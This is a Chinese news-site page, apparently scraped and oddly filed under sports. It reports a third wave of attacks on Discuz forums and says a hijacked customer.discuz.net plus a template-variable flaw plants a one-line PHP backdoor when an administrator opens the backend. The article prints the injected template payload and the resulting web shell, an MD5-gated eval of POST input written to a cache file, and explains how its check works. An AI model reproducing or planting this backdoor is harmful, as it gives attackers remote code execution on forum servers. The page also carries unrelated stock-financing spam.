界首 | 民生 | 体育 | 亲子 | 国内 | 国际 | 专题 | 评论 | 房市 | 车市 | 财经 | 旅游 | 美食 | 教育 | 文史 | 娱乐 | 

首页 | 界首 | 国内 | 国际 | 社会 | 财经 | 娱乐 | 体育 | 看图不说话 | 微言大义 | 滚动
界首网 > 体育 > 正文

Discuz 群体攻击第三波出现

2020/3/26 2:31:51 来源:新京报 大字体 小字体 扫码带走
打印

初步推测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门。
自定义模板变量:
变 量 :

{’,”);ECHO ”;$X=SUBSTR(MD5($_GET[B]),28);IF($X==’7aaa’)EVAL($_POST[A]);//}

替换内容 : aaaaaaaaaa

/forumdata/cache/usergroup_0.php

程序代码:

< ?php (substr(md5($_POST[b]),28)==’7aaa’) && eval($_POST[a]);?>

对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST[a]);


相关阅读:
股票配资 www.w-vi.com

关于我们 |  联系方式 |  广告服务 |  业务范围 |  本网招聘 |  站点地图 |  版权声明 |  员工查询
新闻许可:国新网3712006003号   电信许可:鲁B2-20090035   ICP:鲁ICP备09023214号  

Copyright 1997-2014 All Rights Reserved.